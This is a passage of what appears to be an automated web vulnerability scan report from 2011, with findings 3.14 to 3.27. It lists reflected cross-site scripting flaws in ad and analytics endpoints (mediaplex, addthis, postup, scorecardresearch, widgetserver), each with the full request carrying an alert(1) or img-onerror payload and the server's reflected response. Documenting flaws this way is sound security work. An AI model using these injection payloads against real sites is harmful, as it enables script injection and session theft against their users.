Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=55d8a'%3balert(1)//2ee66e943dc HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 527
Date: Sun, 27 Feb 2011 02:32:18 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=55d8a';alert(1)//2ee66e943dchttp://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=773834215">
...[SNIP]...

3.14. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&8535c'%3balert(1)//a8fa310d924=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 530
Date: Sun, 27 Feb 2011 02:32:52 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&8535c';alert(1)//a8fa310d924=1http://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=773834215">
...[SNIP]...

3.15. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.virtusa.com%2Fpractices%2Fdwbi%2F&callback=_ate.cbs.sc_httpwwwvirtusacompracticesdwbidcd04<script>alert(1)</script>c3a0525ddd9 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/practices/dwbi/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298915503.60|1297806627.66; dt=X; uid=4d5af32c71c2e1a5; psc=2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Tue, 01 Mar 2011 13:40:43 GMT
Content-Length: 98
Connection: close

_ate.cbs.sc_httpwwwvirtusacompracticesdwbidcd04<script>alert(1)</script>c3a0525ddd9({"shares":2});

3.16. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.postup.com
Path:   /TCTUL001/twidget/1.jsonp

Request

GET /TCTUL001/twidget/1.jsonp?jsonp=jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71&numAuthors=7&numPosts=0&bf=tech&uip=&ua=&ref=http%3A%2F%2Ftechcrunch.com%2F2011%2F02%2F16%2Fforbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links%2F&qh=TechCrunch&format=300x600 HTTP/1.1
Host: api.postup.com
Proxy-Connection: keep-alive
Referer: http://www.tweetup.com/twidget/twidget.2.300x600.html?partner=TCTUL001&keyword=TechCrunch&backfill=tech&refurl=http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:32:03 GMT
Content-Type: text/javascript; charset=UTF-8
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: bc=9CE434E0-6353-4F68-9196-9FD9DBD5DD9E;Path=/;Expires=Wed, 24-Feb-21 02:32:03 GMT
Set-Cookie: sc=6148C463-8CE9-4536-981B-E1A093F9C2BB;Path=/
Set-Cookie: bp=NR6mPz0SXEsXB_t8NNHvEsKZO0M;Path=/
CP: NON DSP CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT
Content-Length: 19542

jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71({"users":[{"created_at":"Wed May 19 20:08:01 PDT 2010","description":"News and opinions on technology, internet \u0026 media. Focused on investors, companies and products impacting social and commerci
...[SNIP]...

3.17. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.conduit-banners.com
Path:   /TechCrunchApp-Techcrunch_APP

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee'%3balert(1)//b377350152c&supportedonly=1 HTTP/1.1
Host: apps.conduit-banners.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 27 Feb 2011 03:31:08 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 4674

function imgToGoOnLoad__806157278(imgObj) {var elm = imgObj,func__806157278 = function(){
SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-App'
...[SNIP]...
<img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee';alert(1)//b377350152c" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__806157278(this);" >
...[SNIP]...

3.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=876688<script>alert(1)</script>2d0cdbe6589&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:51 GMT
Date: Sun, 27 Feb 2011 16:44:51 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"876688<script>alert(1)</script>2d0cdbe6589", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955a70f0<script>alert(1)</script>5846377f9ec&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:02 GMT
Date: Sun, 27 Feb 2011 16:45:02 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955a70f0<script>alert(1)</script>5846377f9ec", c15:"", c16:"", r:""});

3.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15=4dfb7<script>alert(1)</script>028085d548b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:02 GMT
Date: Sun, 27 Feb 2011 16:45:02 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"4dfb7<script>alert(1)</script>028085d548b", c16:"", r:""});

3.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113bc9c3<script>alert(1)</script>3733a91cc15&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:52 GMT
Date: Sun, 27 Feb 2011 16:44:52 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
e=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113bc9c3<script>alert(1)</script>3733a91cc15", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20aecfe<script>alert(1)</script>494c6cd0f61&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:53 GMT
Date: Sun, 27 Feb 2011 16:44:53 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
n(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20aecfe<script>alert(1)</script>494c6cd0f61", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=48378fcd2<script>alert(1)</script>164c2634538&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:59 GMT
Date: Sun, 27 Feb 2011 16:44:59 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"48378fcd2<script>alert(1)</script>164c2634538", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=283806569b<script>alert(1)</script>98b62b0333a&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:00 GMT
Date: Sun, 27 Feb 2011 16:45:00 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"283806569b<script>alert(1)</script>98b62b0333a", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=ed016<script>alert(1)</script>37dd9a94977&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:01 GMT
Date: Sun, 27 Feb 2011 16:45:01 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
mscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"ed016<script>alert(1)</script>37dd9a94977", c10:"175955", c15:"", c16:"", r:""});

3.26. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [BnId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=d23ea<img%20src%3da%20onerror%3dalert(1)>11242cb47aa HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:07 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56347


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
get","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=d23ea<img src=a onerror=alert(1)>11242cb47aa"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

3.27. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink94f39<img%20src%3da%20onerror%3dalert(1)>6a768a93c3/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:26 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56525


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
